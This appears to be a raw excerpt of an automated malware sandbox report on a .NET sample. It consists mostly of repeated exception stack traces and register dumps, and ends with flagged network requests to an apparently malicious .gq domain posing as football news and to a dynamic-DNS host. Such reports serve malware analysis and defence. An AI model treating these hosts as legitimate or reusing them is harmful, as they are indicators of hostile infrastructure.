mscorlib+0x2f73b5 @ 0x6eed73b5
mscorlib+0x2eeaf8 @ 0x6eeceaf8
mscorlib+0x2eea8f @ 0x6eecea8f
0xa004a6
0xa000f4
0xa000b2
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6fbb2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x6fc674ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x6fc67610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x6fcf1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x6fcf1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x6fcf1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x6fcf416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7443f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x744b7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x744b4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0xe0434f4e
exception.offset: 46887
exception.address: 0x76a7b727
registers.esp: 3599236
registers.edi: 0
registers.eax: 3599236
registers.ebp: 3599316
registers.edx: 0
registers.ebx: 8441088
registers.esi: 7743184
registers.ecx: 749819278
1 0 0

__exception__

 stacktrace: 
0xa0813e
0xa07639
0xa071c9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6fba2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f
CoUninitializeEE+0xa5b4 CreateAssemblyNameObject-0x36a1 clr+0x29df8 @ 0x6fbc9df8
CoUninitializeEE+0xa5eb CreateAssemblyNameObject-0x366a clr+0x29e2f @ 0x6fbc9e2f
CoUninitializeEE+0xa6b9 CreateAssemblyNameObject-0x359c clr+0x29efd @ 0x6fbc9efd
CoUninitializeEE+0xa75e CreateAssemblyNameObject-0x34f7 clr+0x29fa2 @ 0x6fbc9fa2
LogHelp_TerminateOnAssert+0x16b0b GetPrivateContextsPerfCounters-0x2937 clr+0x8564b @ 0x6fc2564b
CreateAssemblyNameObject+0x2e9ca GetMetaDataInternalInterface-0x9aa5 clr+0x5be63 @ 0x6fbfbe63
CreateAssemblyNameObject+0x2e4ff GetMetaDataInternalInterface-0x9f70 clr+0x5b998 @ 0x6fbfb998
CreateAssemblyNameObject+0x2e28d GetMetaDataInternalInterface-0xa1e2 clr+0x5b726 @ 0x6fbfb726
CreateAssemblyNameObject+0x2eacf GetMetaDataInternalInterface-0x99a0 clr+0x5bf68 @ 0x6fbfbf68
CreateAssemblyNameObject+0x2e84b GetMetaDataInternalInterface-0x9c24 clr+0x5bce4 @ 0x6fbfbce4
DllRegisterServerInternal+0xa898 CoUninitializeEE-0x2ba0 clr+0x1cca4 @ 0x6fbbcca4
DllRegisterServerInternal+0xa92b CoUninitializeEE-0x2b0d clr+0x1cd37 @ 0x6fbbcd37
DllGetClassObjectInternal+0x437c8 CorDllMainForThunk-0x48d33 clr+0x108841 @ 0x6fca8841
LogHelp_TerminateOnAssert+0x129a9 GetPrivateContextsPerfCounters-0x6a99 clr+0x814e9 @ 0x6fc214e9
mscorlib+0x2d3711 @ 0x6eeb3711
mscorlib+0x308f2d @ 0x6eee8f2d
mscorlib+0x2cb060 @ 0x6eeab060
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6fba2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f
LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x6fc21838
LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x6fc21737
mscorlib+0x2d36ad @ 0x6eeb36ad
mscorlib+0x308f2d @ 0x6eee8f2d
microsoft+0x50c17 @ 0x72050c17
microsoft+0x3f33f @ 0x7203f33f
microsoft+0x3edf8 @ 0x7203edf8
microsoft+0x3e3b9 @ 0x7203e3b9
0xa00234
0xa000b2
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6fbb2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x6fc674ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x6fc67610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x6fcf1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x6fcf1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x6fcf1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x6fcf416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7443f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x744b7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x744b4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 39 09 e8 32 2f 45 6e c7 45 e8 00 00 00 00 c7 45
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xa081ab
registers.esp: 3594708
registers.edi: 3594728
registers.eax: 0
registers.ebp: 3594740
registers.edx: 38146600
registers.ebx: 3595040
registers.esi: 38146600
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
0xa08150
0xa07639
0xa071c9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6fba2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f
CoUninitializeEE+0xa5b4 CreateAssemblyNameObject-0x36a1 clr+0x29df8 @ 0x6fbc9df8
CoUninitializeEE+0xa5eb CreateAssemblyNameObject-0x366a clr+0x29e2f @ 0x6fbc9e2f
CoUninitializeEE+0xa6b9 CreateAssemblyNameObject-0x359c clr+0x29efd @ 0x6fbc9efd
CoUninitializeEE+0xa75e CreateAssemblyNameObject-0x34f7 clr+0x29fa2 @ 0x6fbc9fa2
LogHelp_TerminateOnAssert+0x16b0b GetPrivateContextsPerfCounters-0x2937 clr+0x8564b @ 0x6fc2564b
CreateAssemblyNameObject+0x2e9ca GetMetaDataInternalInterface-0x9aa5 clr+0x5be63 @ 0x6fbfbe63
CreateAssemblyNameObject+0x2e4ff GetMetaDataInternalInterface-0x9f70 clr+0x5b998 @ 0x6fbfb998
CreateAssemblyNameObject+0x2e28d GetMetaDataInternalInterface-0xa1e2 clr+0x5b726 @ 0x6fbfb726
CreateAssemblyNameObject+0x2eacf GetMetaDataInternalInterface-0x99a0 clr+0x5bf68 @ 0x6fbfbf68
CreateAssemblyNameObject+0x2e84b GetMetaDataInternalInterface-0x9c24 clr+0x5bce4 @ 0x6fbfbce4
DllRegisterServerInternal+0xa898 CoUninitializeEE-0x2ba0 clr+0x1cca4 @ 0x6fbbcca4
DllRegisterServerInternal+0xa92b CoUninitializeEE-0x2b0d clr+0x1cd37 @ 0x6fbbcd37
DllGetClassObjectInternal+0x437c8 CorDllMainForThunk-0x48d33 clr+0x108841 @ 0x6fca8841
LogHelp_TerminateOnAssert+0x129a9 GetPrivateContextsPerfCounters-0x6a99 clr+0x814e9 @ 0x6fc214e9
mscorlib+0x2d3711 @ 0x6eeb3711
mscorlib+0x308f2d @ 0x6eee8f2d
mscorlib+0x2cb060 @ 0x6eeab060
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6fba2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f
LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x6fc21838
LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x6fc21737
mscorlib+0x2d36ad @ 0x6eeb36ad
mscorlib+0x308f2d @ 0x6eee8f2d
microsoft+0x50c17 @ 0x72050c17
microsoft+0x3f33f @ 0x7203f33f
microsoft+0x3edf8 @ 0x7203edf8
microsoft+0x3e3b9 @ 0x7203e3b9
0xa00234
0xa000b2
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6fbb2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x6fc674ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x6fc67610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x6fcf1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x6fcf1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x6fcf1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x6fcf416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7443f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x744b7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x744b4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 39 09 e8 32 2f 45 6e c7 45 e8 00 00 00 00 c7 45
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xa081ab
registers.esp: 3594708
registers.edi: 3594728
registers.eax: 0
registers.ebp: 3594740
registers.edx: 49586860
registers.ebx: 3595040
registers.esi: 49586860
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
CopyPDBs+0x1b552 DllCanUnloadNowInternal-0x25a85 clr+0x1b1194 @ 0x6fd51194
LogHelp_TerminateOnAssert+0x14061 GetPrivateContextsPerfCounters-0x53e1 clr+0x82ba1 @ 0x6fc22ba1
mscorlib+0x2f45a5 @ 0x6eed45a5
mscorlib+0x2f74d4 @ 0x6eed74d4
mscorlib+0x30c46d @ 0x6eeec46d
system+0xea3b4 @ 0x644ea3b4
system+0xcec2d @ 0x644cec2d
system+0x6f7869 @ 0x658e7869
system+0x6f6e71 @ 0x658e6e71
system+0x6f3892 @ 0x658e3892
system+0x6f3514 @ 0x658e3514
system+0x6f42ec @ 0x658e42ec
0x4a051a
0x4a00f4
0x4a00b2
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6fbb2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x6fc674ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x6fc67610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x6fcf1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x6fcf1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x6fcf1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x6fcf416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7443f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x744b7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x744b4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0xe0434f4e
exception.offset: 46887
exception.address: 0x76a7b727
registers.esp: 4321168
registers.edi: 0
registers.eax: 4321168
registers.ebp: 4321248
registers.edx: 0
registers.ebx: 7836560
registers.esi: 7104304
registers.ecx: 766055242
1 0 0

__exception__

 stacktrace: 
CopyPDBs+0x1b552 DllCanUnloadNowInternal-0x25a85 clr+0x1b1194 @ 0x6fd51194
LogHelp_TerminateOnAssert+0x14061 GetPrivateContextsPerfCounters-0x53e1 clr+0x82ba1 @ 0x6fc22ba1
mscorlib+0x2f45aa @ 0x6eed45aa
mscorlib+0x2f74d4 @ 0x6eed74d4
mscorlib+0x30c46d @ 0x6eeec46d
system+0x9f2d4 @ 0x70baf2d4
system+0xa7fe5 @ 0x70bb7fe5
system+0xab6a2 @ 0x70bbb6a2
system+0xa1e00 @ 0x70bb1e00
system+0x6f4ce3 @ 0x658e4ce3
system+0x6f6fb8 @ 0x658e6fb8
system+0x6f3892 @ 0x658e3892
system+0x6f3514 @ 0x658e3514
system+0x6f42ec @ 0x658e42ec
0x4a051a
0x4a00f4
0x4a00b2
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6fbb2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x6fc674ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x6fc67610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x6fcf1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x6fcf1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x6fcf1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x6fcf416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7443f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x744b7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x744b4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0xe0434f4e
exception.offset: 46887
exception.address: 0x76a7b727
registers.esp: 4320812
registers.edi: 0
registers.eax: 4320812
registers.ebp: 4320892
registers.edx: 0
registers.ebx: 7836560
registers.esi: 7104304
registers.ecx: 766055082
1 0 0

__exception__

 stacktrace: 
0x4a813e
0x4a7639
0x4a71c9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6fba2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f
CoUninitializeEE+0xa5b4 CreateAssemblyNameObject-0x36a1 clr+0x29df8 @ 0x6fbc9df8
CoUninitializeEE+0xa5eb CreateAssemblyNameObject-0x366a clr+0x29e2f @ 0x6fbc9e2f
CoUninitializeEE+0xa6b9 CreateAssemblyNameObject-0x359c clr+0x29efd @ 0x6fbc9efd
CoUninitializeEE+0xa75e CreateAssemblyNameObject-0x34f7 clr+0x29fa2 @ 0x6fbc9fa2
LogHelp_TerminateOnAssert+0x16b0b GetPrivateContextsPerfCounters-0x2937 clr+0x8564b @ 0x6fc2564b
CreateAssemblyNameObject+0x2e9ca GetMetaDataInternalInterface-0x9aa5 clr+0x5be63 @ 0x6fbfbe63
CreateAssemblyNameObject+0x2e4ff GetMetaDataInternalInterface-0x9f70 clr+0x5b998 @ 0x6fbfb998
CreateAssemblyNameObject+0x2e28d GetMetaDataInternalInterface-0xa1e2 clr+0x5b726 @ 0x6fbfb726
CreateAssemblyNameObject+0x2eacf GetMetaDataInternalInterface-0x99a0 clr+0x5bf68 @ 0x6fbfbf68
CreateAssemblyNameObject+0x2e84b GetMetaDataInternalInterface-0x9c24 clr+0x5bce4 @ 0x6fbfbce4
DllRegisterServerInternal+0xa898 CoUninitializeEE-0x2ba0 clr+0x1cca4 @ 0x6fbbcca4
DllRegisterServerInternal+0xa92b CoUninitializeEE-0x2b0d clr+0x1cd37 @ 0x6fbbcd37
DllGetClassObjectInternal+0x437c8 CorDllMainForThunk-0x48d33 clr+0x108841 @ 0x6fca8841
LogHelp_TerminateOnAssert+0x129a9 GetPrivateContextsPerfCounters-0x6a99 clr+0x814e9 @ 0x6fc214e9
mscorlib+0x2d3711 @ 0x6eeb3711
mscorlib+0x308f2d @ 0x6eee8f2d
mscorlib+0x2cb060 @ 0x6eeab060
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6fba2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f
LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x6fc21838
LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x6fc21737
mscorlib+0x2d36ad @ 0x6eeb36ad
mscorlib+0x308f2d @ 0x6eee8f2d
microsoft+0x50c17 @ 0x72050c17
microsoft+0x3f33f @ 0x7203f33f
microsoft+0x3edf8 @ 0x7203edf8
microsoft+0x3e3b9 @ 0x7203e3b9
0x4a0234
0x4a00b2
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6fbb2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x6fc674ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x6fc67610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x6fcf1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x6fcf1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x6fcf1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x6fcf416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7443f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x744b7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x744b4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 39 09 e8 32 2f 9b 6e c7 45 e8 00 00 00 00 c7 45
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x4a81ab
registers.esp: 4316916
registers.edi: 4316936
registers.eax: 0
registers.ebp: 4316948
registers.edx: 38146600
registers.ebx: 4317248
registers.esi: 38146600
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
0x4a8150
0x4a7639
0x4a71c9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6fba2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f
CoUninitializeEE+0xa5b4 CreateAssemblyNameObject-0x36a1 clr+0x29df8 @ 0x6fbc9df8
CoUninitializeEE+0xa5eb CreateAssemblyNameObject-0x366a clr+0x29e2f @ 0x6fbc9e2f
CoUninitializeEE+0xa6b9 CreateAssemblyNameObject-0x359c clr+0x29efd @ 0x6fbc9efd
CoUninitializeEE+0xa75e CreateAssemblyNameObject-0x34f7 clr+0x29fa2 @ 0x6fbc9fa2
LogHelp_TerminateOnAssert+0x16b0b GetPrivateContextsPerfCounters-0x2937 clr+0x8564b @ 0x6fc2564b
CreateAssemblyNameObject+0x2e9ca GetMetaDataInternalInterface-0x9aa5 clr+0x5be63 @ 0x6fbfbe63
CreateAssemblyNameObject+0x2e4ff GetMetaDataInternalInterface-0x9f70 clr+0x5b998 @ 0x6fbfb998
CreateAssemblyNameObject+0x2e28d GetMetaDataInternalInterface-0xa1e2 clr+0x5b726 @ 0x6fbfb726
CreateAssemblyNameObject+0x2eacf GetMetaDataInternalInterface-0x99a0 clr+0x5bf68 @ 0x6fbfbf68
CreateAssemblyNameObject+0x2e84b GetMetaDataInternalInterface-0x9c24 clr+0x5bce4 @ 0x6fbfbce4
DllRegisterServerInternal+0xa898 CoUninitializeEE-0x2ba0 clr+0x1cca4 @ 0x6fbbcca4
DllRegisterServerInternal+0xa92b CoUninitializeEE-0x2b0d clr+0x1cd37 @ 0x6fbbcd37
DllGetClassObjectInternal+0x437c8 CorDllMainForThunk-0x48d33 clr+0x108841 @ 0x6fca8841
LogHelp_TerminateOnAssert+0x129a9 GetPrivateContextsPerfCounters-0x6a99 clr+0x814e9 @ 0x6fc214e9
mscorlib+0x2d3711 @ 0x6eeb3711
mscorlib+0x308f2d @ 0x6eee8f2d
mscorlib+0x2cb060 @ 0x6eeab060
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6fba2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f
LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x6fc21838
LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x6fc21737
mscorlib+0x2d36ad @ 0x6eeb36ad
mscorlib+0x308f2d @ 0x6eee8f2d
microsoft+0x50c17 @ 0x72050c17
microsoft+0x3f33f @ 0x7203f33f
microsoft+0x3edf8 @ 0x7203edf8
microsoft+0x3e3b9 @ 0x7203e3b9
0x4a0234
0x4a00b2
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6fbb2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x6fc674ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x6fc67610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x6fcf1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x6fcf1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x6fcf1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x6fcf416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7443f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x744b7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x744b4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 39 09 e8 32 2f 9b 6e c7 45 e8 00 00 00 00 c7 45
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x4a81ab
registers.esp: 4316916
registers.edi: 4316936
registers.eax: 0
registers.ebp: 4316948
registers.edx: 50151600
registers.ebx: 4317248
registers.esi: 50151600
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
0x4ad85e
0x4acdb7
0x4a83df
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6fba2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f
LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x6fc21838
LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x6fc21737
mscorlib+0x2d3711 @ 0x6eeb3711
mscorlib+0x308f2d @ 0x6eee8f2d
mscorlib+0x2cb060 @ 0x6eeab060
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6fba2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f
LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x6fc21838
LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x6fc21737
mscorlib+0x2d36ad @ 0x6eeb36ad
mscorlib+0x308f2d @ 0x6eee8f2d
microsoft+0x50c17 @ 0x72050c17
microsoft+0x3f33f @ 0x7203f33f
microsoft+0x3edf8 @ 0x7203edf8
microsoft+0x3e3b9 @ 0x7203e3b9
0x4a0234
0x4a00b2
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6fbb2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x6fc674ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x6fc67610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x6fcf1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x6fcf1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x6fcf1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x6fcf416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7443f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x744b7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x744b4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 8b 01 eb 3e 8d 55 e0 0f b6 01 88 02 0f b6 41 01
exception.instruction: mov eax, dword ptr [ecx]
exception.exception_code: 0xc0000005
exception.symbol: mscorlib+0x324f62
exception.address: 0x6ef04f62
registers.esp: 4319220
registers.edi: 4319244
registers.eax: 0
registers.ebp: 4319256
registers.edx: 0
registers.ebx: 50508884
registers.esi: 4194364
registers.ecx: 4194364
1 0 0
suspicious_features GET method with no useragent header suspicious_request GET http://apdocroto.gq/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-C311B505088D4AC5F97AC7A0C3EA6538.html
suspicious_features GET method with no useragent header suspicious_request GET http://apdocroto.gq/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-C1900454F8C1F17DAFA268D4AC67120F.html
domain dontreachme3.ddns.net
request GET http://apdocroto.gq/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-C311B505088D4AC5F97AC7A0C3EA6538.html
request GET http://apdocroto.gq/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-C1900454F8C1F17DAFA268D4AC67120F.html
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 996
region_size: 720896
stack_dep_bypass: 0
stack_pivoted: 0
